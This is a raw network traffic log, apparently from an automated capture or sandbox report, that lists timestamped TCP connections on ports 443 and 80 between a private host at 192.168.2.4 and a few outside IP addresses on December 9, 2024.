                                                  Dec 9, 2024 09:35:23.722521067 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.841213942 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.841238022 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.841418028 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.841429949 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.841476917 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.850243092 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.850280046 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.850317955 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.850320101 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:23.850369930 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.850586891 CET49795443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:23.850600958 CET4434979513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.287436962 CET4434979913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.287945986 CET49799443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.287955999 CET4434979913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.288186073 CET4434980113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.288436890 CET4434980013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.288518906 CET49801443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.288543940 CET4434980113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.288595915 CET4434979813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.288921118 CET49799443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.288925886 CET4434979913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.288981915 CET49801443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.288991928 CET4434980113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.289267063 CET49798443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.289277077 CET4434979813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.289498091 CET49800443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.289524078 CET4434980013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.289608955 CET49798443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.289614916 CET4434979813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.289937973 CET49800443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.289942980 CET4434980013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.720362902 CET4434979913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.720418930 CET4434979913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.720633030 CET49799443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.720664024 CET49799443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.720678091 CET4434979913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.720695972 CET49799443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.720702887 CET4434979913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.721913099 CET4434980113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.721966028 CET4434980113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.722042084 CET49801443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.722166061 CET49801443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.722183943 CET4434980113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.722196102 CET49801443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.722201109 CET4434980113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.723470926 CET49805443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.723479986 CET4434980513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.723541975 CET49805443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.723666906 CET49805443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.723676920 CET4434980513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.724124908 CET49806443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.724164009 CET4434980613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.724224091 CET49806443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.724294901 CET49806443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.724311113 CET4434980613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.726958036 CET4434980013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.726974964 CET4434980013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.727015018 CET4434980013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.727015018 CET4434979813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.727025986 CET49800443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.727036953 CET4434979813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.727062941 CET49800443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.727086067 CET49798443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.727097988 CET4434979813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.727140903 CET49798443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.727181911 CET49800443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.727195978 CET4434980013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.727205992 CET49800443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.727210999 CET4434980013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.727221966 CET49798443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.727226973 CET4434979813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.727241039 CET49798443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.727371931 CET4434979813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.727401018 CET4434979813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.727446079 CET49798443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.729330063 CET49807443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.729337931 CET4434980713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.729377985 CET49808443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.729396105 CET4434980813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.729413986 CET49807443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.729441881 CET49808443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.729531050 CET49807443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.729542017 CET4434980713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:25.729551077 CET49808443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:25.729567051 CET4434980813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.448843002 CET4434980613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.449316978 CET49806443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.449337006 CET4434980613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.449754953 CET49806443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.449760914 CET4434980613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.450325966 CET4434980513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.450576067 CET49805443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.450587034 CET4434980513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.450896978 CET49805443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.450901985 CET4434980513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.476763964 CET4434980713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.476947069 CET4434980813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.477128029 CET49807443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.477135897 CET4434980713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.477216959 CET49808443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.477232933 CET4434980813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.477509975 CET49807443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.477514982 CET4434980713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.477615118 CET49808443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.477621078 CET4434980813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.884481907 CET4434980613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.884540081 CET4434980613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.884598017 CET49806443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.884805918 CET49806443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.884819984 CET4434980613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.884835958 CET49806443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.884841919 CET4434980613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.886683941 CET4434980513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.886740923 CET4434980513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.886791945 CET49805443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.886888981 CET49805443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.886908054 CET4434980513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.886917114 CET49805443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.886921883 CET4434980513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.887825966 CET49809443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.887851000 CET4434980913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.887921095 CET49809443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.888051033 CET49809443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.888065100 CET4434980913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.888694048 CET49810443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.888724089 CET4434981013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.888791084 CET49810443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.888907909 CET49810443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.888921976 CET4434981013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.910304070 CET4434980713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.910351038 CET4434980713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.910401106 CET49807443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.910531044 CET49807443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.910540104 CET4434980713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.910551071 CET49807443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.910553932 CET4434980713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.912204027 CET4434980813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.912255049 CET4434980813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.912307978 CET49811443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.912308931 CET49808443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.912318945 CET4434981113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.912384033 CET49811443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.912466049 CET49808443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.912472963 CET4434980813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.912492037 CET49811443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.912497997 CET49808443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.912502050 CET4434980813.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.912503004 CET4434981113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.914593935 CET49812443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.914617062 CET4434981213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:27.914693117 CET49812443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.914835930 CET49812443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:27.914849043 CET4434981213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:28.619451046 CET4434979713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:28.619911909 CET49797443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:28.619940996 CET4434979713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:28.620316029 CET49797443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:28.620322943 CET4434979713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.057277918 CET4434979713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.057298899 CET4434979713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.057348967 CET4434979713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.057357073 CET49797443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.057394981 CET49797443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.057552099 CET49797443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.057575941 CET4434979713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.057585955 CET49797443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.057591915 CET4434979713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.060098886 CET49813443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.060127020 CET4434981313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.060200930 CET49813443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.060396910 CET49813443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.060410976 CET4434981313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.627074003 CET4434980913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.627222061 CET4434981013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.627660036 CET49809443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.627707005 CET4434980913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.627882004 CET49810443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.627912998 CET4434981013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.628192902 CET49809443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.628199100 CET4434980913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.628339052 CET49810443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.628344059 CET4434981013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.656838894 CET4434981213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.657203913 CET49812443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.657222986 CET4434981213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.657569885 CET49812443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.657574892 CET4434981213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.659082890 CET4434981113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.659328938 CET49811443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.659341097 CET4434981113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:29.659648895 CET49811443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:29.659652948 CET4434981113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.060686111 CET4434981013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.060745955 CET4434981013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.060794115 CET49810443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.060854912 CET4434980913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.060904980 CET4434980913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.061009884 CET49809443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.061084986 CET49810443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.061100960 CET4434981013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.061109066 CET49809443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.061109066 CET49809443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.061115026 CET49810443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.061122894 CET4434981013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.061127901 CET4434980913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.061136007 CET4434980913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.064162970 CET49814443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.064191103 CET4434981413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.064218998 CET49815443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.064258099 CET4434981513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.064265013 CET49814443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.064316034 CET49815443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.064456940 CET49815443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.064457893 CET49814443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.064470053 CET4434981513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.064470053 CET4434981413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.090468884 CET4434981213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.090523958 CET4434981213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.090650082 CET49812443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.090836048 CET49812443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.090842009 CET4434981213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.090873003 CET49812443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.090877056 CET4434981213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.092956066 CET49816443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.092987061 CET4434981613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.093060970 CET49816443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.093111038 CET4434981113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.093162060 CET4434981113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.093185902 CET49816443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.093199968 CET4434981613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.093214989 CET49811443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.093322039 CET49811443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.093327045 CET4434981113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.093348980 CET49811443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.093353033 CET4434981113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.095218897 CET49817443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.095251083 CET4434981713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.095330954 CET49817443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.095455885 CET49817443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.095467091 CET4434981713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.265747070 CET49818443192.168.2.4142.250.181.68
                                                  Dec 9, 2024 09:35:30.265777111 CET44349818142.250.181.68192.168.2.4
                                                  Dec 9, 2024 09:35:30.265896082 CET49818443192.168.2.4142.250.181.68
                                                  Dec 9, 2024 09:35:30.266129017 CET49818443192.168.2.4142.250.181.68
                                                  Dec 9, 2024 09:35:30.266143084 CET44349818142.250.181.68192.168.2.4
                                                  Dec 9, 2024 09:35:30.774435997 CET4434981313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.775101900 CET49813443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.775139093 CET4434981313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:30.775604963 CET49813443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:30.775610924 CET4434981313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.208843946 CET4434981313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.208890915 CET4434981313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.208977938 CET49813443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.209232092 CET49813443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.209249973 CET4434981313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.209260941 CET49813443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.209265947 CET4434981313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.212447882 CET49819443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.212488890 CET4434981913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.212599993 CET49819443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.212775946 CET49819443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.212790966 CET4434981913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.778126001 CET4434981413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.778673887 CET49814443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.778698921 CET4434981413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.778784037 CET4434981513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.779170036 CET49814443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.779175043 CET4434981413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.779562950 CET49815443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.779592037 CET4434981513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.779913902 CET49815443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.779918909 CET4434981513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.808556080 CET4434981613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.808923960 CET49816443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.808943033 CET4434981613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.809300900 CET49816443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.809305906 CET4434981613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.813026905 CET4434981713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.813344955 CET49817443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.813361883 CET4434981713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.813724041 CET49817443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:31.813729048 CET4434981713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:31.954895973 CET44349818142.250.181.68192.168.2.4
                                                  Dec 9, 2024 09:35:31.955199957 CET49818443192.168.2.4142.250.181.68
                                                  Dec 9, 2024 09:35:31.955223083 CET44349818142.250.181.68192.168.2.4
                                                  Dec 9, 2024 09:35:31.955553055 CET44349818142.250.181.68192.168.2.4
                                                  Dec 9, 2024 09:35:31.956073999 CET49818443192.168.2.4142.250.181.68
                                                  Dec 9, 2024 09:35:31.956130028 CET44349818142.250.181.68192.168.2.4
                                                  Dec 9, 2024 09:35:31.998073101 CET49818443192.168.2.4142.250.181.68
                                                  Dec 9, 2024 09:35:32.211540937 CET4434981413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.211596012 CET4434981413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.211749077 CET49814443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.211868048 CET49814443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.211879969 CET4434981413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.211889982 CET49814443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.211895943 CET4434981413.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.212272882 CET4434981513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.212331057 CET4434981513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.212387085 CET49815443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.212475061 CET49815443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.212491989 CET4434981513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.212502956 CET49815443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.212508917 CET4434981513.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.214927912 CET49820443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.214950085 CET4434982013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.215034008 CET49820443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.215060949 CET49821443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.215095043 CET4434982113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.215148926 CET49821443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.215171099 CET49820443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.215182066 CET4434982013.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.215320110 CET49821443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.215332985 CET4434982113.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.241998911 CET4434981613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.242058992 CET4434981613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.242140055 CET49816443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.242386103 CET49816443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.242386103 CET49816443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.242397070 CET4434981613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.242403984 CET4434981613.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.244327068 CET49822443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.244338989 CET4434982213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.244414091 CET49822443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.244539976 CET49822443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.244550943 CET4434982213.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.246586084 CET4434981713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.246639013 CET4434981713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.246690989 CET49817443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.246763945 CET49817443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.246777058 CET4434981713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.246809006 CET49817443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.246818066 CET4434981713.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.248954058 CET49823443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.248965979 CET4434982313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.249020100 CET49823443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.249131918 CET49823443192.168.2.413.107.246.63
                                                  Dec 9, 2024 09:35:32.249142885 CET4434982313.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.435784101 CET4972480192.168.2.4199.232.214.172
                                                  Dec 9, 2024 09:35:32.555758953 CET8049724199.232.214.172192.168.2.4
                                                  Dec 9, 2024 09:35:32.555840969 CET4972480192.168.2.4199.232.214.172
                                                  Dec 9, 2024 09:35:32.931782961 CET4434981913.107.246.63192.168.2.4
                                                  Dec 9, 2024 09:35:32.932425976 CET49819443192.168.2.413.107.246.63
